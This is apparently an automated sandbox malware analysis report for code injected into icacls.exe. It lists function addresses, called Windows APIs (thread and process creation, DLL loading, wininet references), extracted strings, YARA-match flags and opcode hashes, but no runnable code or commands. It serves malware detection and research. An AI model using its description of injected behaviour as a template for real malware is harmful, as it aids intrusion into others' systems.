Instruction ID: 0ff187b763a785829386aa5bc61980751407c25aafb1c2bb5afe208c755d0ee3
Opcode Fuzzy Hash: 1ae4054e9b0a19e91c6e3c1a1c1819ec7b7e7dcb89ed274d1c4f755fb0b4e14e
Instruction Fuzzy Hash: 37900221211C0092D20075698C54B07000587D0383F95C115A1154598CC91589616521

Function 02EF2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2FBA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9032fb95240ca7897c4d2e9e7a1cec006fc67120adcd9ea65b54d4ea79facec3
Instruction ID: f1d1af66843377ff597a8dba35f0c809683f4b75e7b298bc90e55783b011bbc4
Opcode Fuzzy Hash: 9032fb95240ca7897c4d2e9e7a1cec006fc67120adcd9ea65b54d4ea79facec3
Instruction Fuzzy Hash: 8E9002216018009241407169C8849074005ABE1291795C121A1998594D855989656665

Function 02EF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2F3A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 992f1cda3251bf98151742a0506583c3b5eaac832062a5372a81cf8d909faa20
Instruction ID: 9743f197996ad47d5932071a55349346ba1b2e85f21d86cb0d590209d82728a1
Opcode Fuzzy Hash: 992f1cda3251bf98151742a0506583c3b5eaac832062a5372a81cf8d909faa20
Instruction Fuzzy Hash: 0090026134180492D10071598454B070005C7E1381F95C015E2064598D8619CD527126

Function 02EF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2CAA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7a6945831b29b93dfdc59e04900b407e89039197139685cec486900f860a46d
Instruction ID: ece5d5ca26e9e3a5aadcbe376d6222afe9cb56fe2efcacae66174d2ea58cb361
Opcode Fuzzy Hash: e7a6945831b29b93dfdc59e04900b407e89039197139685cec486900f860a46d
Instruction Fuzzy Hash: 0A90023120180452D10075999448647000587E0381F95D011A6024599EC66589917131

Function 02EF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2C6A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35e1ad0440d0a917096ca64ba2a7a16637249d5c4a6412d393561b40471fd129
Instruction ID: bd053b88250ca83010143b0392d469f5e93e4f122e688d51eb49a07e1ee80f6c
Opcode Fuzzy Hash: 35e1ad0440d0a917096ca64ba2a7a16637249d5c4a6412d393561b40471fd129
Instruction Fuzzy Hash: 8A90023120180892D10071598444B47000587E0381F95C016A1124698D8615C9517521

Function 02EF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2C7A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e6c5ef1eb49aec1fd42d1165d6fafc6a48f548475841517ffb8a15e6b4ed3e1
Instruction ID: 57d89736e937f25823e19d6e4bf5eeddbcfa6cf49fe3b12a361f17eb6d0dcb23
Opcode Fuzzy Hash: 4e6c5ef1eb49aec1fd42d1165d6fafc6a48f548475841517ffb8a15e6b4ed3e1
Instruction Fuzzy Hash: 2590023120188852D1107159C44474B000587D0381F99C411A542469CD869589917121

Function 02EF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2DFA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db89dda1c988f9f258242cee456097945e5f8edf0ee5344a1437a2a884544a3d
Instruction ID: f6af0f62e0b33c8faad3e14d8ad1db2466243da8825d6672c624dd0528ea6a2d
Opcode Fuzzy Hash: db89dda1c988f9f258242cee456097945e5f8edf0ee5344a1437a2a884544a3d
Instruction Fuzzy Hash: E690023120180463D11171598544707000987D02C1FD5C412A142459CD96568A52B121

Function 02EF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2DDA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a477f895543b80d3c1ac9fd1e3133635728ab8380c054be981116ee81cdf562d
Instruction ID: e1900cf6d4541e4392ef15e143c714590ff880966af5fe407941dd040f5dc5f1
Opcode Fuzzy Hash: a477f895543b80d3c1ac9fd1e3133635728ab8380c054be981116ee81cdf562d
Instruction Fuzzy Hash: 5B900221242841A25545B1598444507400697E02C17D5C012A2414994C85269956E621

Function 02EF2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2D3A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68a965979693e93ee8546e25b0a5a6547f20ecec17d4c2bf2b3c273e18865993
Instruction ID: 08e5c87e40a1ce59585ed90c9ab0cd017e563af211478ce578f8cc9d81d31614
Opcode Fuzzy Hash: 68a965979693e93ee8546e25b0a5a6547f20ecec17d4c2bf2b3c273e18865993
Instruction Fuzzy Hash: F590022130180053D140715994586074005D7E1381F95D011E1414598CD91589566222

Function 02EF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2D1A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fa5aed572843be2c62e1763259767d69434bc4c38f6071a860420339d9ac49f
Instruction ID: 635c278c963aada19dc5c0e321f36d834e9494c7cd3b64f8bf2873bbf79003ab
Opcode Fuzzy Hash: 5fa5aed572843be2c62e1763259767d69434bc4c38f6071a860420339d9ac49f
Instruction Fuzzy Hash: 9F90022921380052D1807159944860B000587D1282FD5D415A101559CCC91589696321

Function 02EF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF35CA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f41a6c290fa8b0897adb2a34e0820b644cdbc0e3a8f93356f699e4783a36cfe
Instruction ID: 8c1e8c6fc93c266520150171c87e319faaa1ff3df630854afaa2a315ab5e0bec
Opcode Fuzzy Hash: 5f41a6c290fa8b0897adb2a34e0820b644cdbc0e3a8f93356f699e4783a36cfe
Instruction Fuzzy Hash: CD90023160590452D10071598554707100587D0281FA5C411A14245ACD87958A5175A2

Function 02EF39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF39BA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3580f859c51023d9cf5537422938b48d1de30d03481eaab66ff37391e5a32065
Instruction ID: eb3ac3a16debbc0504b3306eea1c3d38d6b699f503f7ab66e49bbe8680ba76ee
Opcode Fuzzy Hash: 3580f859c51023d9cf5537422938b48d1de30d03481eaab66ff37391e5a32065
Instruction Fuzzy Hash: A590022124585152D150715D84446174005A7E0281F95C021A18145D8D855589557221

Function 0270128E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6-G0991eL2, xrefs: 027013FD, 02701409, 0270141A
6-G0991eL2, xrefs: 02701411, 02701414

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID:
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 0-3551662889
Opcode ID: 2cc9f6d8561cc5225360b3d92ec91f07b0f5aed8e12bd0f261c8375aad391206
Instruction ID: 9953c508a5181015d093169d6f535715cb84c7f5f060e4498eee3f5a33c71851
Opcode Fuzzy Hash: 2cc9f6d8561cc5225360b3d92ec91f07b0f5aed8e12bd0f261c8375aad391206
Instruction Fuzzy Hash: 29319C36A04395DBDB12DF64C886BCEBFA4EF82724F64429DD5898B4C2D331550BCB85

Function 02701385 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6-G0991eL2,00000111,00000000,00000000), ref: 0270140A

Strings

6-G0991eL2, xrefs: 027013FD, 02701409, 0270141A
6-G0991eL2, xrefs: 02701411, 02701414

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 1836367815-3551662889
Opcode ID: 5d3d272dfcdcdea67bd06d9455da646f9d0a7cd9628304bc6307a529355e8d3c
Instruction ID: 3498d25ffac642eb3b15daa450e0eb87c50663c1af704ff21b029fa84ce433a5
Opcode Fuzzy Hash: 5d3d272dfcdcdea67bd06d9455da646f9d0a7cd9628304bc6307a529355e8d3c
Instruction Fuzzy Hash: 56110871E41218B6DB22E6D08C46FDF7B7C9F45B50F108054FA047B2C0D6B49A068BEA

Function 02701390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6-G0991eL2,00000111,00000000,00000000), ref: 0270140A

Strings

6-G0991eL2, xrefs: 027013FD, 02701409, 0270141A
6-G0991eL2, xrefs: 02701411, 02701414

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 1836367815-3551662889
Opcode ID: bb9506bde5ae4386d52ccf14494b7dd32e77a11b52004b26029f022c2e29afc8
Instruction ID: 0ad09c7ae10d594a795876da7dbb4b2c63b438493b0d4fbdab46e65181d3bbec
Opcode Fuzzy Hash: bb9506bde5ae4386d52ccf14494b7dd32e77a11b52004b26029f022c2e29afc8
Instruction Fuzzy Hash: E601D671D40218B6DB2196E48C46FDF7B7C9F41B50F008054FA047B2C0D6B46A068BE9

Function 02714010 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 027140DD

Strings

wininet.dll, xrefs: 02714078, 02714084
net.dll, xrefs: 027140A1, 02714128, 02714108, 02714114, 02714134

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b3f9579e45a73045013092193d63c141960ecb100d3e66c945ee516a3d021fa9
Instruction ID: ec789f0e3cd0c5f7e20e08e81f211fc7841e44a5cca85da52421700c7cd14851
Opcode Fuzzy Hash: b3f9579e45a73045013092193d63c141960ecb100d3e66c945ee516a3d021fa9
Instruction Fuzzy Hash: 62313AB1A01605BBD714DFA8D884FEBBBB9FF88714F10851CEA596B244D770A640CBA4

Function 0270FA49 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0270FA67
CoUninitialize.COMBASE ref: 0270FB4E

Strings

@J7<, xrefs: 0270FA7B

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 50676e5990e7a53d9e98c043c7abd739050be2988d57884a4bede185039f0d3f
Instruction ID: 600c36639f54160d36ebd47be10010796f692c7e0d6caaccde07730502df65df
Opcode Fuzzy Hash: 50676e5990e7a53d9e98c043c7abd739050be2988d57884a4bede185039f0d3f
Instruction Fuzzy Hash: E03141B5A0020ADFDB10DFD8C8809EEB7B9FF88304B108559E515EB254DB75EE058FA1

Function 0270FA50 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0270FA67
CoUninitialize.COMBASE ref: 0270FB4E

Strings

@J7<, xrefs: 0270FA7B

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 44687b49929eca887e438442135864dab8930b1a208dbcf938f4cb3ad9e8c5a2
Instruction ID: c9bbded400ad3788643cd3386fff09176c8eea2b33bd9686980184312e377621
Opcode Fuzzy Hash: 44687b49929eca887e438442135864dab8930b1a208dbcf938f4cb3ad9e8c5a2
Instruction Fuzzy Hash: 6E312FB5A0060AEFDB10DFD8C8809EEB7B9FF88304B108559E505EB254DB75EE058FA1

Function 02704AB0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02704B22

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction ID: ecc8ee8be3fd4c9ec838646a33f83f2f462ccdbed97b2757956a60292bd11b7d
Opcode Fuzzy Hash: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction Fuzzy Hash: 110171B5D4020DABDF11EBE4DC85F9EB7B99F44308F0041A5EA0997280F630EB18CB91

Function 02719CF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000230,00000258,00000030,?,02708864,00000010,00000258,?,?,00000044,00000258,00000010,02708864,?,00000030,00000258), ref: 02719D53

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3c19e00b64e168f95e4b63f1ac4ff245d4bf5ef6499da960d5921ed02e3bcd14
Instruction ID: 8a443366c79689cf7858202feffef8459c5f37bbd472626e0bcb7976e50118c7
Opcode Fuzzy Hash: 3c19e00b64e168f95e4b63f1ac4ff245d4bf5ef6499da960d5921ed02e3bcd14
Instruction Fuzzy Hash: 7A01C0B2214208BFCB44DE89DC80EDB77AEAF8C754F408208BA1DE3240D630F851CBA4

Function 026F9E00 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 026F9E42

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1a51ace06b6b1de1039ca0a9e0f619b35115d0c882a4584601bf67ed82eeb8a6
Instruction ID: 00dc3ce29b6e097623b00fe9b39ef74bd3233577b0b90d07a799b38373a4954e
Opcode Fuzzy Hash: 1a51ace06b6b1de1039ca0a9e0f619b35115d0c882a4584601bf67ed82eeb8a6
Instruction Fuzzy Hash: F6F0397328021436E721A1AD9C02FDBB29C9F81BA5F14042AFB0CEB280E992B44146E9

Function 026F9DFC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 026F9E42

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 514ee7f0e06ac37824ab6ae4bc7641db5c29ed83912a6ce075dbfd339321736e
Instruction ID: 99041dee693663dcdccf9f6a583ce2761fcab47ca3b9295a50f3b9d8244d66d0
Opcode Fuzzy Hash: 514ee7f0e06ac37824ab6ae4bc7641db5c29ed83912a6ce075dbfd339321736e
Instruction Fuzzy Hash: 33E09A7328120076E772A2F88D03FEB779C9F86B94F240459F74CAB2C0D992B4414BB9

Function 02719C60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,5533D08B,00000007,00000000,00000004,00000000,02704392,000000F4), ref: 02719C9C

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1a448b9298212b68dc29894f52df21a4cd2100653fccb5a723d49d0bf6431244
Instruction ID: 4a2f4b43a5506ad9c1ea212344540bfaf5968de4b033adf7339fee34558d8fdd
Opcode Fuzzy Hash: 1a448b9298212b68dc29894f52df21a4cd2100653fccb5a723d49d0bf6431244
Instruction Fuzzy Hash: E5E06D71200249BFDB10EE59DC40FDB77ADEFC9720F004019FA18A7282D630B8108AB4

Function 02719C10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02702029,?,027164B3,02702029,02715BCF,027164B3,?,02702029,02715BCF,00001000,?,?,00000000), ref: 02719C4F

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b9d43f51537022a0287f4499684c9dfd411c440df1a547a51fa3a8f188f675c2
Instruction ID: 1278b51e4f0a22ecc3c72248c2206bc9e59506e0aa6a08563e14e5292d378df7
Opcode Fuzzy Hash: b9d43f51537022a0287f4499684c9dfd411c440df1a547a51fa3a8f188f675c2
Instruction Fuzzy Hash: EEE0ED712002047BDB14EF59DC45F9B77AEEFC5760F008419F919A7241D671B9108BB5

Function 027088A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 027088CA

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 013613be3e5758cf83434b0155c0c1f5a84ee676bf0c28c554000fe7c3b2c864
Instruction ID: 2ed59095a325e488f0cd2b93c37c405f89e7f8863a9c223de4bb6b60dddfcee7
Opcode Fuzzy Hash: 013613be3e5758cf83434b0155c0c1f5a84ee676bf0c28c554000fe7c3b2c864
Instruction Fuzzy Hash: 0AE086716603087BEB24A6AC9CC7FA733998B48728F184660F91CDB3C2D674F542C359

Function 027086A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02702310,0271850F,02715BCF,027022E0), ref: 027086D1

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ccd9222d449e461453e526399ba7810bf23dbf21c11a1354ed9508d76345ab97
Instruction ID: a845e5a973b7f5286ea85158e5dfa56a0534f1f6e5616bbe79ce006f576c6f39
Opcode Fuzzy Hash: ccd9222d449e461453e526399ba7810bf23dbf21c11a1354ed9508d76345ab97
Instruction Fuzzy Hash: D7D05E726403047BEA51E6E99C43F5B328D4B44694F054068FA0CEB3C2ED51F1104A6A

Function 02EF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2C24

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 087b61f0cfb50893717335cb1e4fc242623bc77a48f16adc8ee7372d48129661
Instruction ID: a22c9c31a9624f254e77479fa086b12ddbbda32d21395424de0aadcf8a1fde66
Opcode Fuzzy Hash: 087b61f0cfb50893717335cb1e4fc242623bc77a48f16adc8ee7372d48129661
Instruction Fuzzy Hash: 19B092729429C5DAEA51E7608A08B1B7A00ABD0785F6AC062E3030686E4738C1D1F2B6

Non-executed Functions

Function 02D2E0D9 Relevance: 56.5, Strings: 45, Instructions: 214COMMON

Download Yara Rule

Strings

@@@@, xrefs: 02D2E202
@@@@, xrefs: 02D2E26B
@@@@, xrefs: 02D2E287
@@@@, xrefs: 02D2E233
@@@@, xrefs: 02D2E2B8
@@@@, xrefs: 02D2E28E
@@@@, xrefs: 02D2E264
%&'(, xrefs: 02D2E1C3
@@@@, xrefs: 02D2E1A7
@@@@, xrefs: 02D2E295
@@@@, xrefs: 02D2E210
!"#$, xrefs: 02D2E1BC
@@@@, xrefs: 02D2E23A
@@@@, xrefs: 02D2E2A3
